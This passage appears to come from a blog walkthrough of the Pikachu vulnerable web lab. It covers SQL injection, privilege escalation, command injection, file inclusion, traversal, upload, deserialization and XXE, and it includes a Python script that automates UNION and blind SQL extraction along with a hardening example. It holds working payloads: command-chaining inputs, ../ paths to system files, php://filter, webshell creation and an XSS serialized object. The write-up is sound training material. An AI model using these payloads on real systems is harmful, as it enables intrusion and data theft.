if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li><li>That also takes 5 seconds to load, so the first character of the database name is <code>p</code>; sqlmap automates this variant too<br><img src="https://i0.imgs.ovh/2024/02/07/bqbKX.png"></li></ul><h4 id="宽字节注入-1"><a href="#宽字节注入-1" class="headerlink" title="宽字节注入"></a>Wide-byte injection</h4><ul><li>The backend escapes the input: <code>'</code> becomes <code>\'</code>, so the payload <code>vince' or 1=1 ;#</code> no longer works</li><li>Because the MySQL connection uses GBK, the escaped quote arrives as the bytes <code>%5c%27</code>; prefixing <code>%df</code> gives <code>%df%5c%27</code>, and GBK decodes <code>%df%5c</code> as a single two-byte character, which swallows the backslash and leaves the quote <code>%27</code> free to close the literal</li><li>The payload becomes <code>vince%df' or 1=1;#</code><br><img src="https://i0.imgs.ovh/2024/02/07/b9LTA.png"></li></ul><h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" 
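></a></h2>
<p>The column counting, UNION and blind procedures above, as an added worked example that is not part of the original post: a Python script against an in-memory SQLite stand-in for the Pikachu <code>member</code> table (the rows are constructed sample data, and the query shape in <code>vulnerable_search</code> is modeled on the string-concatenated lookup the levels expose). It counts the columns with ORDER BY (distinguishing an error page from a normal one, as in the search level), dumps rows with UNION SELECT, then recovers a value character by character through a rows/no-rows oracle. SQLite has no <code>#</code> comment, <code>ascii()</code> or <code>sleep()</code>, so the payloads use <code>-- </code> and <code>unicode()</code>; against MySQL the same loop uses <code>ascii(substr())</code> as the levels do, and the time-based variant swaps the oracle for a response-time threshold.</p>

```python
import sqlite3

# Constructed stand-in for the Pikachu `member` table; rows are sample data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member(id INTEGER, username TEXT, pw TEXT, email TEXT);
        INSERT INTO member VALUES (1, 'vince', 'e10adc3949ba59abbe56e057f20f883e', 'vince@pikachu.com');
        INSERT INTO member VALUES (2, 'allen', '0d107d09f5bbe40cade3de5c71e9e9b7', 'allen@pikachu.com');
        INSERT INTO member VALUES (3, 'lucy',  '0d107d09f5bbe40cade3de5c71e9e9b7', 'lucy@pikachu.com');
    """)
    return conn

def vulnerable_search(conn, name):
    """String-type injection point as on the page: the value is spliced into a
    quoted literal. Returns the rows, or None when the statement fails; the
    backend is assumed to hide the error text, so the attacker only ever
    observes rows / no rows / a generic failure page."""
    sql = f"SELECT id, username, email FROM member WHERE username = '{name}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None

def count_columns(conn, max_cols=16):
    """ORDER BY n probing: the first n that makes the statement fail is one
    past the number of columns in the original SELECT."""
    for n in range(1, max_cols + 1):
        if vulnerable_search(conn, f"vince' ORDER BY {n} -- ") is None:
            return n - 1
    return None

def union_dump(conn, ncols):
    """UNION-based retrieval once the column count is known: the injected
    SELECT is padded with NULLs so both sides have the same width."""
    cols = ["username", "pw"] + ["NULL"] * (ncols - 2)
    rows = vulnerable_search(conn, "x' UNION SELECT " + ", ".join(cols) + " FROM member -- ")
    return {(r[0], r[1]) for r in (rows or [])}

def boolean_oracle(conn, cond):
    """True when the injected condition holds (the 'rows' page is returned)."""
    return bool(vulnerable_search(conn, f"vince' AND ({cond}) -- "))

def blind_extract(conn, subquery, max_len=64):
    """Boolean-based blind extraction of one string, one character at a time,
    by binary search over the code point. The page guesses with '=', which
    costs up to 127 requests per character; '>' guesses cost about seven."""
    out = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if boolean_oracle(conn, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr() past the end gives '' and unicode('') is NULL: never true
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)
    print("columns:", n)
    print("union:", union_dump(db, n))
    print("blind:", blind_extract(db, "SELECT pw FROM member WHERE username = 'vince'"))
```

<p>The request count is what separates the two blind variants in practice: with seven requests per character the time-based form, where every true guess costs a 5-second sleep, stays usable, whereas linear guessing with <code>=</code> does not.</p>
<h2><a href="#越权漏洞" class="headerlink" 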
title="越权漏洞"></a>Broken access control (privilege escalation)</h2><h3 id="概述-4"><a href="#概述-4" class="headerlink" title="概述"></a>Overview</h3><ul><li><p>Because user permissions are not checked strictly, a low-privilege account can perform operations reserved for high-privilege accounts</p></li><li><p>A logic flaw: the authorisation logic is not rigorous</p></li><li><p>Horizontal privilege escalation</p><ul><li>Between accounts at the same privilege level</li></ul></li><li><p>Vertical privilege escalation</p><ul><li>Between different privilege levels</li></ul></li></ul><h3 id="Pikachu关卡-4"><a href="#Pikachu关卡-4" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><h4 id="水平越权"><a href="#水平越权" class="headerlink" title="水平越权"></a>Horizontal escalation</h4><ul><li><p>Log in as lucy; clicking "view personal information" sends the GET request <code>http://192.168.1.9:7071/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF</code></p></li><li><p>The server may not check that the requester owns the record, in which case one user can read another user's information</p></li><li><p>While logged in as lucy, change lucy in the request above to another username (e.g. lili): the record is returned<br><img src="https://i0.imgs.ovh/2024/02/07/b9W5u.png"></p></li></ul><h4 id="垂直越权"><a href="#垂直越权" class="headerlink" title="垂直越权"></a>Vertical escalation</h4><ul><li><p>In this level pikachu is an ordinary administrator and admin is the super administrator; only the super administrator may add users</p></li><li><p>Capture the super administrator's add-user request, log out, log in as the ordinary administrator, replace the cookie in the captured request's headers with pikachu's cookie, fill the body with the new user's details and send it</p><p><img src="https://i0.imgs.ovh/2024/02/07/b9KRI.png"></p></li></ul><h2 id="RCE-命令执行漏洞"><a href="#RCE-命令执行漏洞" class="headerlink" title="RCE-命令执行漏洞"></a>RCE: command execution</h2><h3 id="概述-5"><a href="#概述-5" class="headerlink" title="概述"></a>Overview</h3><ul><li>Lets an attacker inject commands or malicious code directly and take control of the backend server</li></ul><h4 id="远程系统命令执行"><a href="#远程系统命令执行" class="headerlink" title="远程系统命令执行"></a>Remote system command execution</h4><ul><li><p><strong>Principle</strong>: the system exposes a feature that runs a specific command on the user's behalf (such as ping) without strict control over the argument</p></li><li><p>Example:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">host </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">shell_exec</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">ping -c 4 </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">host</span><span style="color: #89DDFF">}"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li><li><p><code>shell_exec()</code> hands the whole string to a shell, so submitting <code>127.0.0.1; ipconfig</code> runs the second command as well (on Windows cmd use <code>&</code>, <code>&&</code>, <code>|</code> or <code>||</code>, since cmd does not treat <code>;</code> as a separator)</p></li></ul><h3 id="Pikachu关卡-5"><a href="#Pikachu关卡-5" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><h4 id="ping-远程系统命令执行"><a href="#ping-远程系统命令执行" class="headerlink" title="ping-远程系统命令执行"></a>ping: remote system command execution</h4><ul><li><code>|</code>, <code>||</code>, <code>&</code> and similar separators can be used to chain commands; apparently nothing is filtered<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20170114.png?raw=true"></li></ul><h4 id="eval-远程代码执行"><a href="#eval-远程代码执行" class="headerlink" title="eval-远程代码执行"></a>eval: remote code execution</h4><ul><li><p>The hint suggests the backend passes the input to <code>eval()</code></p></li><li><p>Submit <code>phpinfo();</code> to check whether code is executed<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20170509.png?raw=true"></p></li><li><p>Arbitrary code runs; HackBar shows the parameter name is <code>txt</code>, so connect with AntSword (蚁剑) using that key</p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20171007.png?raw=true"></p></li><li><p>Webshell obtained</p></li></ul><h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>File inclusion</h2><h3 id="概述-6"><a href="#概述-6" class="headerlink" title="概述"></a>Overview</h3><ul><li><code>include(), require(), include_once(), require_once()</code> parse and execute the included file as PHP</li><li>When <code>allow_url_include</code> and <code>allow_url_fopen</code> are <code>On</code>, remote files can be included by URL as well, usually in combination with PHP stream wrappers (pseudo-protocols)</li></ul><h3 id="Pikachu关卡-6"><a href="#Pikachu关卡-6" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><h4 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>Local file inclusion</h4><ul><li><p>The URL carries a filename parameter whose value is fileX.php, with X from 1 to 5<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20172345.png?raw=true"></p></li><li><p>Try a different file, e.g. file6.php<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20172548.png?raw="></p></li><li><p>The content of file6.php is parsed and some information is revealed</p></li></ul><h4 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>Remote file inclusion</h4><ul><li><p>Besides local files, targets reachable over http or through PHP wrappers can be included, e.g. <code>php://filter/read=convert.base64-encode/resource=...</code> returns a page's source as base64 instead of executing it<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20173642.png?raw="></p></li><li><p>Decoding the base64 gives the source code<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20173853.png?raw="></p></li></ul><h2 id="不安全的文件下载"><a href="#不安全的文件下载" class="headerlink" title="不安全的文件下载"></a>Unsafe file download</h2><h3 id="概述-7"><a href="#概述-7" class="headerlink" title="概述"></a>Overview</h3><ul><li>If a download feature receives, instead of the file name it expects, a crafted path such as ../../../etc/passwd, it will very likely serve that file, exposing sensitive backend data (password files, source code and so on)</li></ul><h3 id="Pikachu关卡-7"><a href="#Pikachu关卡-7" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li><p>The download link is:<br><code>http://192.168.5.143:7090/vul/unsafedownload/execdownload.php?filename=kb.png</code></p></li><li><p>Replace <code>kb.png</code> with a file at another path, e.g. the current page <code>../down_nba.php</code>: it downloads<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20174553.png?raw="></p></li><li><p>Almost any file the web server process can read can be fetched the same way, e.g. the system.ini configuration file on the C drive:<br><code>http://192.168.5.143:7090/vul/unsafedownload/execdownload.php?filename=../../../../../../Windows/system.ini</code></p></li></ul><h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>File upload</h2><h3 id="概述-8"><a href="#概述-8" class="headerlink" title="概述"></a>Overview</h3><ul><li><a href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0">Common vulnerabilities: file upload | Myprefer's Blog</a></li></ul><h3 id="Pikachu关卡-8"><a href="#Pikachu关卡-8" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><h4 id="客户端check"><a href="#客户端check" class="headerlink" title="客户端check"></a>Client-side check</h4><ul><li>The check runs only in the browser; edit the JavaScript or modify the request in a proxy to bypass it<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20175850.png?raw="></li></ul><h4 id="服务端check"><a href="#服务端check" class="headerlink" title="服务端check"></a>Server-side check</h4><ul><li>The server only checks the declared MIME type: intercept the upload and change the Content-Type of the file part to image/jpeg</li></ul><h4 id="getimagesize"><a href="#getimagesize" class="headerlink" title="getimagesize()"></a>getimagesize()</h4><ul><li><p>getimagesize() parses the image header, so the upload must really start as an image: build a polyglot image with the webshell appended</p></li><li><p>Generate it with <code>copy tmp.png/b+eval.php 1.jpg</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20180938.png?raw="></p></li><li><p>The one-line webshell is now appended to the jpg file</p></li><li><p>After upload the file has a .jpg extension and is not executed directly, but it can be combined with the file inclusion vulnerability, which executes whatever it includes:<br><code>http://192.168.1.5/pikachu/vul/fileinclude/fi_local.php?filename=file:///C:\phpstudy_pro\WWW\pikachu\vul\unsafeupload\uploads\1.jpg</code></p></li></ul><h2 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>Directory traversal</h2><h3 id="概述-9"><a href="#概述-9" class="headerlink" title="概述"></a>Overview</h3><ul><li><p>Web features often turn the file to be accessed into a variable so that the frontend is more flexible: the request carries the value (e.g. a file name) to the backend, which then opens or executes that file</p></li><li><p>If the backend does not validate that value, an attacker can use <code>../</code> to make it open or execute other files, exposing the contents of other directories on the server: a directory traversal vulnerability</p></li></ul><h3 id="Pikachu关卡-9"><a href="#Pikachu关卡-9" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li>The <strong>title</strong> parameter accepts <code>../</code> to reach any directory and leak its contents, e.g. the system.ini file<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20182400.png?raw="></li></ul><h2 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>Sensitive information disclosure</h2><h3 id="概述-10"><a href="#概述-10" class="headerlink" title="概述"></a>Overview</h3><ul><li>Through carelessness or poor design, data that frontend users should never see becomes easy to reach<ul><li>Requesting a directory URL lists the <strong>files</strong> in it</li><li><strong>Error messages</strong> reveal the operating system, middleware or language version and other details</li><li>The <strong>frontend source</strong> contains sensitive information</li></ul></li></ul><h3 id="Pikachu关卡-10"><a 
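class="headerlink"></a></h3>
<p>Before the information-disclosure level, a hardened counterpart for the sinks met in the command-execution, file-inclusion, file-download and directory-traversal sections above, as an added example that is not part of the original post. <code>ping_argv</code> replaces <code>shell_exec("ping -c 4 {$host}")</code>: it accepts only an IP address literal or an RFC 1123 hostname and returns an argument list meant for <code>subprocess.run(argv)</code> with no shell, so <code>127.0.0.1; ipconfig</code> or <code>127.0.0.1 | whoami</code> is rejected rather than interpreted. <code>resolve_under_base</code> replaces the unchecked <code>filename=</code>, <code>title=</code> and include parameters: it refuses stream wrappers and absolute paths, then resolves the candidate and requires the result to stay inside the base directory, which is what defeats <code>../</code> chains however they are spelled. <code>DOWNLOAD_DIR</code> is an assumed path; the inputs exercised are the payloads from the levels.</p>

```python
import ipaddress
import re
from pathlib import Path

# Assumed location of the Pikachu download directory (hypothetical path).
DOWNLOAD_DIR = "/var/www/pikachu/vul/unsafedownload/download"

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
# Shell metacharacters (; | & ` $ ( ) and whitespace) cannot appear in a match.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)

def is_valid_host(host):
    """True for an IPv4/IPv6 literal or a syntactically valid hostname."""
    host = host.strip()
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return _HOSTNAME.match(host) is not None

def ping_argv(host, count=4):
    """Hardened form of shell_exec("ping -c 4 {$host}"): validate first, then
    return an argv list for subprocess.run(argv) (shell=False), so the value is
    handed to ping as one argument and is never parsed by a command interpreter."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", str(int(count)), host.strip()]

_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]+:", re.IGNORECASE)   # php:, file:, http:, dict:
_DRIVE = re.compile(r"^[a-z]:", re.IGNORECASE)                # C:\...

def resolve_under_base(base_dir, user_path):
    """Hardened form of execdownload.php?filename=... and include($_GET[...]):
    reject NUL bytes, wrappers and absolute paths up front, then resolve the
    candidate and insist that the resolved path lies inside base_dir. The last
    check is the one that matters: it holds after any number of ../ segments,
    mixed separators or already-decoded encodings, where a denylist would not."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    if _SCHEME.match(user_path):
        raise ValueError("stream wrappers and URLs are not allowed")
    if user_path.startswith(("/", "\\")) or _DRIVE.match(user_path):
        raise ValueError("absolute paths are not allowed")
    base = Path(base_dir).resolve()
    target = (base / user_path.replace("\\", "/")).resolve()
    if base not in target.parents:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return target

def is_allowed(base_dir, user_path):
    """Boolean wrapper around resolve_under_base for callers that only gate."""
    try:
        resolve_under_base(base_dir, user_path)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    for h in ["127.0.0.1", "127.0.0.1; ipconfig", "127.0.0.1 | whoami"]:
        print(h, "->", ping_argv(h) if is_valid_host(h) else "rejected")
    for p in ["kb.png", "../down_nba.php", "../../../../../../Windows/system.ini",
              "file:///C:/Windows/system.ini",
              "php://filter/read=convert.base64-encode/resource=fi_local.php"]:
        print(p, "->", "ok" if is_allowed(DOWNLOAD_DIR, p) else "rejected")
```

<p>Two limits worth knowing: the hostname grammar is not a substitute for running without a shell (both are applied, and the argv form is the one that actually removes the interpreter), and the path check only restricts which file is opened, so the polyglot image from the upload level passes it; whether that file is then executed is decided by the include sink, not by this function.</p>
<h3><a 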
href="#Pikachu关卡-10" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li>The frontend source leaks sensitive information<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20182757.png?raw="></li></ul><h2 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP deserialization</h2><h3 id="概述-11"><a href="#概述-11" class="headerlink" title="概述"></a>Overview</h3><ul><li><a href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">Web attack and defence: deserialization | Myprefer's Blog</a></li></ul><h3 id="Pikachu关卡-11"><a href="#Pikachu关卡-11" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><ul><li><p>Exploiting this requires reading the code; the vulnerable part:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">var</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">test </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">pikachu</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">__construct</span><span style="color: #89DDFF">(){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$this-></span><span style="color: #BABED8">test</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">''</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">o</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">s </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">o</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(!@$</span><span style="color: #BABED8">unser </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">unserialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p>大兄弟,来点劲爆点儿的!</p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p></span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">unser</span><span style="color: #89DDFF">-></span><span style="color: #BABED8">test</span><span style="color: #89DDFF">}</span><span style="color: #C3E88D"></p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>The <code>test</code> property of the deserialized object is echoed into the page without escaping, so the payload is a serialized <code>S</code> with a chosen <code>test</code> value; the code that generates it:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">var</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">test </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">123333</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">a </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">new</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">serialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20184225.png?raw="></p></li><li><p>This can be turned into XSS, e.g. <code>O:1:"S":1:{s:4:"test";s:25:"<script>alert(1)</script>";}</code> (the <code>s:25</code> is the byte length of the string and must match exactly, or <code>unserialize()</code> fails)<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20184518.png?raw="></p></li></ul><h2 id="XXE-xml外部实体注入漏洞"><a href="#XXE-xml外部实体注入漏洞" class="headerlink" title="XXE-xml外部实体注入漏洞"></a>XXE: XML external entity injection</h2><h3 id="概述-12"><a href="#概述-12" class="headerlink" title="概述"></a>Overview</h3><ul><li>XXE (XML External Entity attack): the attacker submits an XML document whose DTD declares an external entity; when the parser resolves that entity it reads the referenced file or URL on the server's behalf and the content ends up in the parsed document</li></ul><h4 id="XML-DTD"><a href="#XML-DTD" class="headerlink" title="XML&DTD"></a>XML&DTD</h4><ul><li>XML (Extensible Markup Language) is a format for transmitting data</li><li>DTD (Document Type Definition) is the part of an XML document that defines its elements, <strong>i.e. the semantic constraints on the document</strong></li></ul><h4 id="XML结构"><a href="#XML结构" class="headerlink" title="XML结构"></a>XML structure</h4><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic"><!--Part 1: XML declaration--></span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">?></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--Part 2: document type definition (DTD)--></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">entity-name</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">URL/URL</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--Part 3: document elements--></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">to</span><span style="color: #89DDFF">></span><span style="color: #BABED8">123</span><span style="color: #89DDFF"></</span><span style="color: #F07178">to</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">from</span><span style="color: #89DDFF">></span><span style="color: #BABED8">abc</span><span style="color: #89DDFF"></</span><span style="color: #F07178">from</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">head</span><span style="color: #89DDFF">></span><span style="color: #BABED8">xyz</span><span style="color: #89DDFF"></</span><span style="color: #F07178">head</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">body</span><span style="color: #89DDFF">></span><span style="color: #BABED8">hhhh</span><span style="color: #89DDFF"></</span><span style="color: #F07178">body</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span></code></pre></div><h4 id="外部实体引用payload"><a href="#外部实体引用payload" class="headerlink" title="外部实体引用payload"></a>External entity reference payload</h4><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #C792EA"> encoding</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">UTF-8</span><span style="color: #89DDFF">"</span><span style="color: 